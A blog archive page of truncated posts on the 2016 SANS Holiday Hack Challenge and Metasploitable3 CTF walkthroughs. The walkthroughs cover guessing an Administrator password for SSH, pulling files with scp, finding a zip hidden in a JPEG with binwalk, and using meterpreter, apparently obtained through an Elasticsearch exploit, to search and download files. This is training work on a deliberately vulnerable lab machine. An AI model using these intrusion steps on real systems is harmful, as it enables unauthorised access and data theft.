Posts

Showing posts from December, 2016

SANS Holiday Hack Challenge 2016 - Tips from the North Pole Elves

Tips from the North Pole Elves

Hello again, long time no see. I was working on the SANS Holiday Hack Challenge and at last I've submitted my write-up today, although I couldn't find 2 NetWars coins. I'll share my solutions once the challenge is over after January 4th. For now, I want to share the tips that the Elves from the North Pole gave us to help with the challenges. The Elves in the North Pole give a lot of information and tips about possible vulnerabilities that can be exploited and tools to use.

· Alabaster Snowball:
  o Mentions JSON parameter editing
  o Recommends using BurpSuite
· Holly Evergreen:
  o Once all the Cranberry Pi pieces are found she provides the Cranbian image.
· Shiny Upatree:
  o Mentions APK files are just...

Metasploitable 3 - Broken flags (cards)

Hello, I just got this from the Metasploitable 3 team at Rapid7:

From: CaptureTheFlag (1:57 PM)

Hello,

You are receiving this e-mail because according to our record, you are an active participant for the Metasploitable3 CTF. The CTF team would like to address two issues with these flags: Seven of Hearts and Jack of Diamonds, please read carefully.

Seven of Hearts

The Seven of Hearts is probably missing in your Metasploitable3 image, because we made a typo in the installation script. To make sure you have this card, you can either:

Rebuild the image by doing:
1. In your repository, do "git pull" to update
2. Do: "vagrant destroy"
3. Do: "vagrant up", and this should rebuild the image. It will take a while.

Or update a...

Here we go again! THE 2016 SANS HOLIDAY HACK CHALLENGE

The SANS Institute just published the 2016 SANS HOLIDAY HACK CHALLENGE! Good luck everyone!

https://twitter.com/SANSPenTest/status/808059170696101888

The Seven of Spades

Metasploitable 3

The Seven of Spades

Once I guessed the Administrator user's password I was able to log in through SSH to the Metasploitable3 server:

root@igor-kali:~# ssh Administrator@10.20.10.19
Administrator@10.20.10.19's password:
Permission denied, please try again.
Administrator@10.20.10.19's password:
-sh-4.3$
-sh-4.3$ pwd
/cygdrive/c/Users/Administrator

I started navigating through the folders and ended up in Users/Public/Documents and, looking at the list of files, I found a PDF file.

-sh-4.3$ cd Public
-sh-4.3$ ls
Desktop  Documents  Downloads  Favorites  Libraries  Music  Pictures  Videos  desktop.ini
-sh-4.3$ cd Documents/
-sh-4.3$ ls
My Music  My Pictures  My Videos  desktop.ini  jack_of_hearts.docx  seven_of_spades.pdf

I downloaded the file using scp:

root@igor-kali:~# scp Administrator@10.20.10.19:/cygdrive/c/Users/Public/Documents/seven_of_spades.pdf .
Adm...

The Ace of Hearts

Metasploitable 3

The Ace of Hearts

With the Ten of Diamonds, we also downloaded the Ace of Hearts, this time a JPEG file. Let's take a look:

Not the card we are looking for

Ok, this is not what we're looking for; I guess we want PNG files. Let's take a closer look at the file with binwalk:

root@igor-kali:~# binwalk ace_of_hearts.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
20087         0x4E77          Zip archive data, at least v1.0 to extract, compressed size: 459917, uncompressed size: 459917, name: ace_of_hearts.png
480150        0x75396         End of Zip archive

Bingo, there's a Zip file attached to the JPEG file that has an ace_of_hearts.png file inside. Some people will extract the ZIP file with 'dd' or with 'foremost' but I'll just make a copy and rename to zip and unzip...

The Ten of Diamonds

Metasploitable 3

The Ten of Diamonds

We go back to our meterpreter, thanks to Elasticsearch, and run a search:

meterpreter > pwd
C:\Program Files\elasticsearch-1.1.1
meterpreter > cd c:\
meterpreter > search
[-] You must specify a valid file glob to search for, e.g. >search -f *.doc
meterpreter > pwd
C:\
meterpreter > search -f *diamonds*
Found 6 results...
    C:\jack_of_diamonds.png
    C:\Program Files\OpenSSH\home\Public\Pictures\ten_of_diamonds.png (406134 bytes)
    C:\Users\Public\Pictures\ten_of_diamonds.png (406134 bytes)
    C:\inetpub\wwwroot\six_of_diamonds.zip (384916 bytes)
    C:\vagrant\resources\flags\six_of_diamonds.zip (384916 bytes)
    C:\vagrant\resources\flags\ten_of_diamonds.png (406134 bytes)
meterpreter >

If we start a shell and look at the folder we can see it's a SYMLINK to C:\Users:

meterpreter > shell
Process 1 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microso...

The Jack of Clubs

Metasploitable 3

The Jack of Clubs

Remember I found this while troubleshooting the Queen of Hearts issue?

meterpreter > search -f jack*.png
Found 3 results...
    C:\jack_of_diamonds.png
    C:\Windows\System32\jack_of_clubs.png (523644 bytes)
    C:\vagrant\resources\flags\jack_of_clubs.png (523644 bytes)

Let's go download it:

meterpreter > cd Windows
meterpreter > cd System32
meterpreter > pwd
C:\Windows\System32
meterpreter > download C:\Windows\System32\jack_of_clubs.png
[*] downloading: jack_of_clubs.png -> jack_of_clubs.png
[*] download   : jack_of_clubs.png -> jack_of_clubs.png

Done!

The Queen of Hearts

Metasploitable 3

The Queen of Hearts

Ok, I want a shell now... WordPress might give me one, but let's look at another interesting port:

9200/tcp  open  http       Elasticsearch REST API 1.1.1 (name: Ziggy Pig; Lucene 4.7)

I'm a Splunk guy, so let's hit Elasticsearch :D I have no idea what to do with Elasticsearch so let's google. Metasploit has something for Elasticsearch. Let's load msfconsole and search for Elasticsearch:

msf > search elasticsearch

Matching Modules
================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   auxiliary/scanner/elasticsearch/indices_enum                      normal  ElasticSearch Indices Enumeration Utility
   auxiliary/scanner/http/elasticsearch_traversal                    normal  ElasticSearch Snapshot API Directory Traversal
   exploit/multi/elast...